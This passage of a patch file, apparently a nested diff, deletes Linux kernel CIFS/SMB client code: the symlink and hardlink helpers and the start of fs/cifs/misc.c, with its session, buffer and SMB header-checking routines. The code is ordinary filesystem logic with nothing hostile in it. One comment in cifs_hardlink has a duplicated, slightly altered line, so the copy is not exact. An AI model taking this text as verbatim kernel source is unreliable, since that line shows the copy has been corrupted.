+-	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	rc = format_mf_symlink(buf, CIFS_MF_SYMLINK_FILE_SIZE, toName);
+-	if (rc)
+-		goto out;
+-
+-	if (tcon->ses->server->ops->create_mf_symlink)
+-		rc = tcon->ses->server->ops->create_mf_symlink(xid, tcon,
+-					cifs_sb, fromName, buf, &bytes_written);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (bytes_written != CIFS_MF_SYMLINK_FILE_SIZE)
+-		rc = -EIO;
+-out:
+-	kfree(buf);
+-	return rc;
+-}
+-
+-int
+-check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		 struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
+-		 const unsigned char *path)
+-{
+-	int rc;
+-	u8 *buf = NULL;
+-	unsigned int link_len = 0;
+-	unsigned int bytes_read = 0;
+-	char *symlink = NULL;
+-
+-	if (!couldbe_mf_symlink(fattr))
+-		/* it's not a symlink */
+-		return 0;
+-
+-	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	if (tcon->ses->server->ops->query_mf_symlink)
+-		rc = tcon->ses->server->ops->query_mf_symlink(xid, tcon,
+-					      cifs_sb, path, buf, &bytes_read);
+-	else
+-		rc = -ENOSYS;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (bytes_read == 0) /* not a symlink */
+-		goto out;
+-
+-	rc = parse_mf_symlink(buf, bytes_read, &link_len, &symlink);
+-	if (rc == -EINVAL) {
+-		/* it's not a symlink */
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	if (rc != 0)
+-		goto out;
+-
+-	/* it is a symlink */
+-	fattr->cf_eof = link_len;
+-	fattr->cf_mode &= ~S_IFMT;
+-	fattr->cf_mode |= S_IFLNK | S_IRWXU | S_IRWXG | S_IRWXO;
+-	fattr->cf_dtype = DT_LNK;
+-	fattr->cf_symlink_target = symlink;
+-out:
+-	kfree(buf);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * SMB 1.0 Protocol specific functions
+- */
+-
+-int
+-cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		      char *pbuf, unsigned int *pbytes_read)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	FILE_ALL_INFO file_info;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+-	if (rc)
+-		return rc;
+-
+-	if (file_info.EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
+-		rc = -ENOENT;
+-		/* it's not a symlink */
+-		goto out;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = CIFSSMBRead(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
+-out:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-	return rc;
+-}
+-
+-int
+-cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		       char *pbuf, unsigned int *pbytes_written)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_CREATE,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		return rc;
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = CIFSSMBWrite(xid, &io_parms, pbytes_written, pbuf);
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/*
+- * SMB 2.1/SMB3 Protocol specific functions
+- */
+-int
+-smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		      char *pbuf, unsigned int *pbytes_read)
+-{
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct smb2_file_all_info *pfile_info = NULL;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.path = path,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.fid = &fid,
+-	};
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (utf16_path == NULL)
+-		return -ENOMEM;
+-
+-	pfile_info = kzalloc(sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
+-			     GFP_KERNEL);
+-
+-	if (pfile_info == NULL) {
+-		kfree(utf16_path);
+-		return  -ENOMEM;
+-	}
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, pfile_info, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		goto qmf_out_open_fail;
+-
+-	if (pfile_info->EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
+-		/* it's not a symlink */
+-		rc = -ENOENT; /* Is there a better rc to return? */
+-		goto qmf_out;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-	io_parms.persistent_fid = fid.persistent_fid;
+-	io_parms.volatile_fid = fid.volatile_fid;
+-	rc = SMB2_read(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
+-qmf_out:
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-qmf_out_open_fail:
+-	kfree(utf16_path);
+-	kfree(pfile_info);
+-	return rc;
+-}
+-
+-int
+-smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-		       char *pbuf, unsigned int *pbytes_written)
+-{
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct kvec iov[2];
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.path = path,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_CREATE,
+-		.fid = &fid,
+-		.mode = 0644,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc) {
+-		kfree(utf16_path);
+-		return rc;
+-	}
+-
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
+-	io_parms.persistent_fid = fid.persistent_fid;
+-	io_parms.volatile_fid = fid.volatile_fid;
+-
+-	/* iov[0] is reserved for smb header */
+-	iov[1].iov_base = pbuf;
+-	iov[1].iov_len = CIFS_MF_SYMLINK_FILE_SIZE;
+-
+-	rc = SMB2_write(xid, &io_parms, pbytes_written, iov, 1);
+-
+-	/* Make sure we wrote all of the symlink data */
+-	if ((rc == 0) && (*pbytes_written != CIFS_MF_SYMLINK_FILE_SIZE))
+-		rc = -EIO;
+-
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-/*
+- * M-F Symlink Functions - End
+- */
+-
+-int
+-cifs_hardlink(struct dentry *old_file, struct inode *inode,
+-	      struct dentry *direntry)
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	const char *from_name, *to_name;
+-	void *page1, *page2;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsInodeInfo *cifsInode;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page1 = alloc_dentry_path();
+-	page2 = alloc_dentry_path();
+-
+-	from_name = build_path_from_dentry(old_file, page1);
+-	if (IS_ERR(from_name)) {
+-		rc = PTR_ERR(from_name);
+-		goto cifs_hl_exit;
+-	}
+-	to_name = build_path_from_dentry(direntry, page2);
+-	if (IS_ERR(to_name)) {
+-		rc = PTR_ERR(to_name);
+-		goto cifs_hl_exit;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext)
+-		rc = CIFSUnixCreateHardLink(xid, tcon, from_name, to_name,
+-					    cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-	else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		server = tcon->ses->server;
+-		if (!server->ops->create_hardlink) {
+-			rc = -ENOSYS;
+-			goto cifs_hl_exit;
+-		}
+-		rc = server->ops->create_hardlink(xid, tcon, from_name, to_name,
+-						  cifs_sb);
+-		if ((rc == -EIO) || (rc == -EINVAL))
+-			rc = -EOPNOTSUPP;
+-	}
+-
+-	d_drop(direntry);	/* force new lookup from server of target */
+-
+-	/*
+-	 * if source file is cached (oplocked) revalidate will not go to server
+-	 * until the file is closed or oplock broken so update nlinks locally
+-	 */
+-	if (d_really_is_positive(old_file)) {
+-		cifsInode = CIFS_I(d_inode(old_file));
+-		if (rc == 0) {
+-			spin_lock(&d_inode(old_file)->i_lock);
+-			inc_nlink(d_inode(old_file));
+-			spin_unlock(&d_inode(old_file)->i_lock);
+-
+-			/*
+-			 * parent dir timestamps will update from srv within a
+-			 * second, would it really be worth it to set the parent
+-			 * second; would it really be worth it to set the parent
+-			 * (faster) for it too?
+-			 */
+-		}
+-		/*
+-		 * if not oplocked will force revalidate to get info on source
+-		 * file from srv.  Note Samba server prior to 4.2 has a bug -
+-		 * not updating src file ctime on hardlinks but Windows servers
+-		 * handle it properly
+-		 */
+-		cifsInode->time = 0;
+-
+-		/*
+-		 * Will update parent dir timestamps from srv within a second.
+-		 * Would it really be worth it to set the parent dir (cifs
+-		 * inode) time field to zero to force revalidate on parent
+-		 * directory faster ie
+-		 *
+-		 * CIFS_I(inode)->time = 0;
+-		 */
+-	}
+-
+-cifs_hl_exit:
+-	free_dentry_path(page1);
+-	free_dentry_path(page2);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int
+-cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
+-	     struct dentry *direntry, const char *symname)
+-{
+-	int rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-	struct inode *newinode = NULL;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	page = alloc_dentry_path();
+-	if (!page)
+-		return -ENOMEM;
+-
+-	xid = get_xid();
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto symlink_exit;
+-	}
+-	pTcon = tlink_tcon(tlink);
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto symlink_exit;
+-	}
+-
+-	cifs_dbg(FYI, "Full path: %s\n", full_path);
+-	cifs_dbg(FYI, "symname is %s\n", symname);
+-
+-	/* BB what if DFS and this volume is on different share? BB */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
+-		rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	else if (pTcon->unix_ext)
+-		rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname,
+-					   cifs_sb->local_nls,
+-					   cifs_remap(cifs_sb));
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	/* else
+-	   rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName,
+-					cifs_sb_target->local_nls); */
+-
+-	if (rc == 0) {
+-		if (pTcon->posix_extensions)
+-			rc = smb311_posix_get_inode_info(&newinode, full_path, inode->i_sb, xid);
+-		else if (pTcon->unix_ext)
+-			rc = cifs_get_inode_info_unix(&newinode, full_path,
+-						      inode->i_sb, xid);
+-		else
+-			rc = cifs_get_inode_info(&newinode, full_path, NULL,
+-						 inode->i_sb, xid, NULL);
+-
+-		if (rc != 0) {
+-			cifs_dbg(FYI, "Create symlink ok, getinodeinfo fail rc = %d\n",
+-				 rc);
+-		} else {
+-			d_instantiate(direntry, newinode);
+-		}
+-	}
+-symlink_exit:
+-	free_dentry_path(page);
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+deleted file mode 100644
+index 31e06133acc3d..0000000000000
+--- a/fs/cifs/misc.c
++++ /dev/null
+@@ -1,1434 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/ctype.h>
+-#include <linux/mempool.h>
+-#include <linux/vmalloc.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smberr.h"
+-#include "nterr.h"
+-#include "cifs_unicode.h"
+-#include "smb2pdu.h"
+-#include "cifsfs.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dns_resolve.h"
+-#include "dfs_cache.h"
+-#endif
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-extern mempool_t *cifs_sm_req_poolp;
+-extern mempool_t *cifs_req_poolp;
+-
+-/* The xid serves as a useful identifier for each incoming vfs request,
+-   in a similar way to the mid which is useful to track each sent smb,
+-   and CurrentXid can also provide a running counter (although it
+-   will eventually wrap past zero) of the total vfs operations handled
+-   since the cifs fs was mounted */
+-
+-unsigned int
+-_get_xid(void)
+-{
+-	unsigned int xid;
+-
+-	spin_lock(&GlobalMid_Lock);
+-	GlobalTotalActiveXid++;
+-
+-	/* keep high water mark for number of simultaneous ops in filesystem */
+-	if (GlobalTotalActiveXid > GlobalMaxActiveXid)
+-		GlobalMaxActiveXid = GlobalTotalActiveXid;
+-	if (GlobalTotalActiveXid > 65000)
+-		cifs_dbg(FYI, "warning: more than 65000 requests active\n");
+-	xid = GlobalCurrentXid++;
+-	spin_unlock(&GlobalMid_Lock);
+-	return xid;
+-}
+-
+-void
+-_free_xid(unsigned int xid)
+-{
+-	spin_lock(&GlobalMid_Lock);
+-	/* if (GlobalTotalActiveXid == 0)
+-		BUG(); */
+-	GlobalTotalActiveXid--;
+-	spin_unlock(&GlobalMid_Lock);
+-}
+-
+-struct cifs_ses *
+-sesInfoAlloc(void)
+-{
+-	struct cifs_ses *ret_buf;
+-
+-	ret_buf = kzalloc(sizeof(struct cifs_ses), GFP_KERNEL);
+-	if (ret_buf) {
+-		atomic_inc(&sesInfoAllocCount);
+-		spin_lock_init(&ret_buf->ses_lock);
+-		ret_buf->ses_status = SES_NEW;
+-		++ret_buf->ses_count;
+-		INIT_LIST_HEAD(&ret_buf->smb_ses_list);
+-		INIT_LIST_HEAD(&ret_buf->tcon_list);
+-		mutex_init(&ret_buf->session_mutex);
+-		spin_lock_init(&ret_buf->iface_lock);
+-		INIT_LIST_HEAD(&ret_buf->iface_list);
+-		spin_lock_init(&ret_buf->chan_lock);
+-	}
+-	return ret_buf;
+-}
+-
+-void
+-sesInfoFree(struct cifs_ses *buf_to_free)
+-{
+-	struct cifs_server_iface *iface = NULL, *niface = NULL;
+-
+-	if (buf_to_free == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to sesInfoFree\n");
+-		return;
+-	}
+-
+-	atomic_dec(&sesInfoAllocCount);
+-	kfree(buf_to_free->serverOS);
+-	kfree(buf_to_free->serverDomain);
+-	kfree(buf_to_free->serverNOS);
+-	kfree_sensitive(buf_to_free->password);
+-	kfree(buf_to_free->user_name);
+-	kfree(buf_to_free->domainName);
+-	kfree_sensitive(buf_to_free->auth_key.response);
+-	spin_lock(&buf_to_free->iface_lock);
+-	list_for_each_entry_safe(iface, niface, &buf_to_free->iface_list,
+-				 iface_head)
+-		kref_put(&iface->refcount, release_iface);
+-	spin_unlock(&buf_to_free->iface_lock);
+-	kfree_sensitive(buf_to_free);
+-}
+-
+-struct cifs_tcon *
+-tconInfoAlloc(void)
+-{
+-	struct cifs_tcon *ret_buf;
+-
+-	ret_buf = kzalloc(sizeof(*ret_buf), GFP_KERNEL);
+-	if (!ret_buf)
+-		return NULL;
+-	ret_buf->cfids = init_cached_dirs();
+-	if (!ret_buf->cfids) {
+-		kfree(ret_buf);
+-		return NULL;
+-	}
+-
+-	atomic_inc(&tconInfoAllocCount);
+-	ret_buf->status = TID_NEW;
+-	++ret_buf->tc_count;
+-	spin_lock_init(&ret_buf->tc_lock);
+-	INIT_LIST_HEAD(&ret_buf->openFileList);
+-	INIT_LIST_HEAD(&ret_buf->tcon_list);
+-	spin_lock_init(&ret_buf->open_file_lock);
+-	spin_lock_init(&ret_buf->stat_lock);
+-	atomic_set(&ret_buf->num_local_opens, 0);
+-	atomic_set(&ret_buf->num_remote_opens, 0);
+-
+-	return ret_buf;
+-}
+-
+-void
+-tconInfoFree(struct cifs_tcon *tcon)
+-{
+-	if (tcon == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to tconInfoFree\n");
+-		return;
+-	}
+-	free_cached_dirs(tcon->cfids);
+-	atomic_dec(&tconInfoAllocCount);
+-	kfree(tcon->nativeFileSystem);
+-	kfree_sensitive(tcon->password);
+-	kfree(tcon);
+-}
+-
+-struct smb_hdr *
+-cifs_buf_get(void)
+-{
+-	struct smb_hdr *ret_buf = NULL;
+-	/*
+-	 * The SMB2 header is bigger than the CIFS one, so it is no problem
+-	 * to clear a few extra bytes for CIFS.
+-	 */
+-	size_t buf_size = sizeof(struct smb2_hdr);
+-
+-	/*
+-	 * We could use the negotiated size instead of max_msgsize -
+-	 * but it may be more efficient to always alloc the same size,
+-	 * albeit slightly larger than necessary, since maxbuffersize
+-	 * defaults to this and cannot be bigger.
+-	 */
+-	ret_buf = mempool_alloc(cifs_req_poolp, GFP_NOFS);
+-
+-	/* clear the first few header bytes */
+-	/* for most paths, more is cleared in header_assemble */
+-	memset(ret_buf, 0, buf_size + 3);
+-	atomic_inc(&buf_alloc_count);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_inc(&total_buf_alloc_count);
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	return ret_buf;
+-}
+-
+-void
+-cifs_buf_release(void *buf_to_free)
+-{
+-	if (buf_to_free == NULL) {
+-		/* cifs_dbg(FYI, "Null buffer passed to cifs_buf_release\n");*/
+-		return;
+-	}
+-	mempool_free(buf_to_free, cifs_req_poolp);
+-
+-	atomic_dec(&buf_alloc_count);
+-	return;
+-}
+-
+-struct smb_hdr *
+-cifs_small_buf_get(void)
+-{
+-	struct smb_hdr *ret_buf = NULL;
+-
+-/* We could use the negotiated size instead of max_msgsize -
+-   but it may be more efficient to always alloc the same size,
+-   albeit slightly larger than necessary, since maxbuffersize
+-   defaults to this and cannot be bigger */
+-	ret_buf = mempool_alloc(cifs_sm_req_poolp, GFP_NOFS);
+-	/* No need to clear memory here, cleared in header assemble */
+-	/*	memset(ret_buf, 0, sizeof(struct smb_hdr) + 27);*/
+-	atomic_inc(&small_buf_alloc_count);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_inc(&total_small_buf_alloc_count);
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	return ret_buf;
+-}
+-
+-void
+-cifs_small_buf_release(void *buf_to_free)
+-{
+-
+-	if (buf_to_free == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to cifs_small_buf_release\n");
+-		return;
+-	}
+-	mempool_free(buf_to_free, cifs_sm_req_poolp);
+-
+-	atomic_dec(&small_buf_alloc_count);
+-	return;
+-}
+-
+-void
+-free_rsp_buf(int resp_buftype, void *rsp)
+-{
+-	if (resp_buftype == CIFS_SMALL_BUFFER)
+-		cifs_small_buf_release(rsp);
+-	else if (resp_buftype == CIFS_LARGE_BUFFER)
+-		cifs_buf_release(rsp);
+-}
+-
+-/* NB: the MID cannot be set if treeCon is not passed in; in that
+-   case it is the responsibility of the caller to set the mid */
+-void
+-header_assemble(struct smb_hdr *buffer, char smb_command /* command */ ,
+-		const struct cifs_tcon *treeCon, int word_count
+-		/* length of fixed section (word count) in two byte units  */)
+-{
+-	char *temp = (char *) buffer;
+-
+-	memset(temp, 0, 256); /* bigger than MAX_CIFS_HDR_SIZE */
+-
+-	buffer->smb_buf_length = cpu_to_be32(
+-	    (2 * word_count) + sizeof(struct smb_hdr) -
+-	    4 /*  RFC 1001 length field does not count */  +
+-	    2 /* for bcc field itself */) ;
+-
+-	buffer->Protocol[0] = 0xFF;
+-	buffer->Protocol[1] = 'S';
+-	buffer->Protocol[2] = 'M';
+-	buffer->Protocol[3] = 'B';
+-	buffer->Command = smb_command;
+-	buffer->Flags = 0x00;	/* case sensitive */
+-	buffer->Flags2 = SMBFLG2_KNOWS_LONG_NAMES;
+-	buffer->Pid = cpu_to_le16((__u16)current->tgid);
+-	buffer->PidHigh = cpu_to_le16((__u16)(current->tgid >> 16));
+-	if (treeCon) {
+-		buffer->Tid = treeCon->tid;
+-		if (treeCon->ses) {
+-			if (treeCon->ses->capabilities & CAP_UNICODE)
+-				buffer->Flags2 |= SMBFLG2_UNICODE;
+-			if (treeCon->ses->capabilities & CAP_STATUS32)
+-				buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-
+-			/* Uid is not converted */
+-			buffer->Uid = treeCon->ses->Suid;
+-			if (treeCon->ses->server)
+-				buffer->Mid = get_next_mid(treeCon->ses->server);
+-		}
+-		if (treeCon->Flags & SMB_SHARE_IS_IN_DFS)
+-			buffer->Flags2 |= SMBFLG2_DFS;
+-		if (treeCon->nocase)
+-			buffer->Flags  |= SMBFLG_CASELESS;
+-		if ((treeCon->ses) && (treeCon->ses->server))
+-			if (treeCon->ses->server->sign)
+-				buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-	}
+-
+-/*  endian conversion of flags is now done just before sending */
+-	buffer->WordCount = (char) word_count;
+-	return;
+-}
+-
+-static int
+-check_smb_hdr(struct smb_hdr *smb)
+-{
+-	/* does it have the right SMB "signature"? */
+-	if (*(__le32 *) smb->Protocol != cpu_to_le32(0x424d53ff)) {
+-		cifs_dbg(VFS, "Bad protocol string signature header 0x%x\n",
+-			 *(unsigned int *)smb->Protocol);
+-		return 1;
+-	}
+-
+-	/* if it's a response then accept */
+-	if (smb->Flags & SMBFLG_RESPONSE)
+-		return 0;
+-
+-	/* only one valid case where server sends us request */
+-	if (smb->Command == SMB_COM_LOCKING_ANDX)
+-		return 0;
+-
+-	cifs_dbg(VFS, "Server sent request, not response. mid=%u\n",
+-		 get_mid(smb));
+-	return 1;
+-}
+-
+-int
+-checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
+-{
+-	struct smb_hdr *smb = (struct smb_hdr *)buf;
+-	__u32 rfclen = be32_to_cpu(smb->smb_buf_length);
+-	__u32 clc_len;  /* calculated length */
+-	cifs_dbg(FYI, "checkSMB Length: 0x%x, smb_buf_length: 0x%x\n",
+-		 total_read, rfclen);
+-
+-	/* is this frame too small to even get to a BCC? */
+-	if (total_read < 2 + sizeof(struct smb_hdr)) {
+-		if ((total_read >= sizeof(struct smb_hdr) - 1)
+-			    && (smb->Status.CifsError != 0)) {
+-			/* it's an error return */
+-			smb->WordCount = 0;
+-			/* some error cases do not return wct and bcc */
+-			return 0;
+-		} else if ((total_read == sizeof(struct smb_hdr) + 1) &&
+-				(smb->WordCount == 0)) {
+-			char *tmp = (char *)smb;
+-			/* Need to work around a bug in two servers here */
+-			/* First, check if the part of bcc they sent was zero */
+-			if (tmp[sizeof(struct smb_hdr)] == 0) {
+-				/* some servers return only half of bcc
+-				 * on simple responses (wct, bcc both zero)
+-				 * in particular have seen this on
+-				 * ulogoffX and FindClose. This leaves
+-				 * one byte of bcc potentially uninitialized
+-				 */
+-				/* zero rest of bcc */
+-				tmp[sizeof(struct smb_hdr)+1] = 0;
+-				return 0;
+-			}
+-			cifs_dbg(VFS, "rcvd invalid byte count (bcc)\n");
+-		} else {
+-			cifs_dbg(VFS, "Length less than smb header size\n");
+-		}
+-		return -EIO;
+-	}
+-
+-	/* otherwise, there is enough to get to the BCC */
+-	if (check_smb_hdr(smb))
+-		return -EIO;
+-	clc_len = smbCalcSize(smb);
+-
+-	if (4 + rfclen != total_read) {
+-		cifs_dbg(VFS, "Length read does not match RFC1001 length %d\n",
+-			 rfclen);
+-		return -EIO;
+-	}
+-
+-	if (4 + rfclen != clc_len) {
+-		__u16 mid = get_mid(smb);
+-		/* check if bcc wrapped around for large read responses */
+-		if ((rfclen > 64 * 1024) && (rfclen > clc_len)) {
+-			/* check if lengths match mod 64K */
+-			if (((4 + rfclen) & 0xFFFF) == (clc_len & 0xFFFF))
+-				return 0; /* bcc wrapped */
+-		}
+-		cifs_dbg(FYI, "Calculated size %u vs length %u mismatch for mid=%u\n",
+-			 clc_len, 4 + rfclen, mid);
+-
+-		if (4 + rfclen < clc_len) {
+-			cifs_dbg(VFS, "RFC1001 size %u smaller than SMB for mid=%u\n",
+-				 rfclen, mid);
+-			return -EIO;
+-		} else if (rfclen > clc_len + 512) {
+-			/*
+-			 * Some servers (Windows XP in particular) send more
+-			 * data than the lengths in the SMB packet would
+-			 * indicate on certain calls (byte range locks and
+-			 * trans2 find first calls in particular). While the
+-			 * client can handle such a frame by ignoring the
+-			 * trailing data, we choose to limit the amount of extra
+-			 * data to 512 bytes.
+-			 */
+-			cifs_dbg(VFS, "RFC1001 size %u more than 512 bytes larger than SMB for mid=%u\n",
+-				 rfclen, mid);
+-			return -EIO;
+-		}
+-	}
+-	return 0;
+-}
+-
+-bool
+-is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
+-{
+-	struct smb_hdr *buf = (struct smb_hdr *)buffer;
+-	struct smb_com_lock_req *pSMB = (struct smb_com_lock_req *)buf;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsInodeInfo *pCifsInode;
+-	struct cifsFileInfo *netfile;
+-
+-	cifs_dbg(FYI, "Checking for oplock break or dnotify response\n");
+-	if ((pSMB->hdr.Command == SMB_COM_NT_TRANSACT) &&
+-	   (pSMB->hdr.Flags & SMBFLG_RESPONSE)) {
+-		struct smb_com_transaction_change_notify_rsp *pSMBr =
+-			(struct smb_com_transaction_change_notify_rsp *)buf;
+-		struct file_notify_information *pnotify;
+-		__u32 data_offset = 0;
+-		size_t len = srv->total_read - sizeof(pSMBr->hdr.smb_buf_length);
+-
+-		if (get_bcc(buf) > sizeof(struct file_notify_information)) {
+-			data_offset = le32_to_cpu(pSMBr->DataOffset);
+-
+-			if (data_offset >
+-			    len - sizeof(struct file_notify_information)) {
+-				cifs_dbg(FYI, "Invalid data_offset %u\n",
+-					 data_offset);
+-				return true;
+-			}
+-			pnotify = (struct file_notify_information *)
+-				((char *)&pSMBr->hdr.Protocol + data_offset);
+-			cifs_dbg(FYI, "dnotify on %s Action: 0x%x\n",
+-				 pnotify->FileName, pnotify->Action);
